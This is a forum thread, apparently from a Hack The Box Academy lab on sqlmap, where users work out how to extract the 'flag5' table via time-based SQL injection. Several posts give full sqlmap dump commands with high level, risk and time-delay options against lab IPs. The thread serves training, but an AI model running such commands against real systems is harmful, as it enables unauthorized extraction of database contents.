Hey,
I am currently on cast #5 on the sqlmap essentials room, I found the ejection and most of the flag, but can’t get the full flag. The hint says to run the command few times to get the correct result, but no mather how many times I ran it and changed commands, it didnt help.
The command I run:
sqlmap -u http://157.245.33.77:30661/case5.php?id=1
What should I do?
Thanks
SOLUTION:
I restarted the target and it worked. If you get a flag that ends with 9, change it to ‘7}’ and that’s it.
hey man i am also getting an error. i’ve restarted the target many times and the table dumps but it looks like it could be a HTB issue.
I restarted the machine like 10 times until I got the right flag, HTB should fix it
In my case I had to substitute the character ` for _ that was in my flag and it worked.
Hi, i proved the command and give me an error content in the flag5 table dump i guess. Any help?
use the or condition, with --batch --dump
I recommend everyone to watch “Cybr” video on sqlmap’s Risk and Level options explanation.
Getting the answer is easier than you think:
1.Intercept the request with burpsuite
2. Execute sqlmap -r case5.txt --no-cast -T flag5 --batch --dump
In this case, neither --risk nor --level is necessary.
If you get a “blank” restart the Box, it’s still an issue.
I dont get it, I tried these commands:
sqlmap -u http://94.237.54.170:58561/case5.php?id=1 --no-cast --dump -T flag5 --level=5 --risk=3
sqlmap -u http://94.237.54.170:58561/case5.php?id=1 --no-cast --batch --dump -T flag5 --level=5 --risk=3
I do actually get the flag for table flag5, but HTB tells me its the wrong answer
Finally, it works!
I would like to share my experience, hopefully it will help those who struggle like me. I ran it 2 days on my laptop, and it never work. I switch to Hack The Box Academy Parrot Attack Box, and it work at first tried.
this pretty much explains it. using the pwnbox would have the least latency. you just have to repeat doing the right commands and removing the saved output so it doesnt continue from previous sessions.
Man this question drove me insane. Turns out increasing the seconds to delay DBMS response needs to be increased to 10secs because the box is so laggy! Here is the cmd that worked for me hope it helps the rest of you guys who probably have the correct answer just minus the secs delay parameter.
sqlmap -u "94.237.63.201:50727/case5.php?id=1" --batch --dump -T flag5 -D testdb --no-cast --dbms=MySQL --technique=T --time-sec=10 --level=5 --risk=3 --fresh-queries
Also restarting the box is advisable and increase the “time-sec” param if the system says your flag is incorrect as the format it returns is sometimes garbled. Too me like 1 hour for it to decode correctly.
To make this easier and faster.
Run first the below command to have a cache session.
sqlmap -u http://<IP>:<PORT>/case5.php?id=1 -T flag5 -D testdb --level 5 --risk 3 --batch --dump
If your lucky you would already found the flag on the result.
If not, re-run the second command below but refresh the queries this would be faster since we already have the cache session from the previous run.
sqlmap -u http://<IP>:<PORT>/case5.php?id=1 -T flag5 -D testdb --level 5 --risk 3 --batch --dump --fresh-queries --threads=10
In that second command the threads are set to 10 so its much more faster to retrieve and finish the time-based injection. Faster retrieval in time-based means lesser error on the retrieved data.
You can run the second query as many times as you like until you retrieve the whole correct data.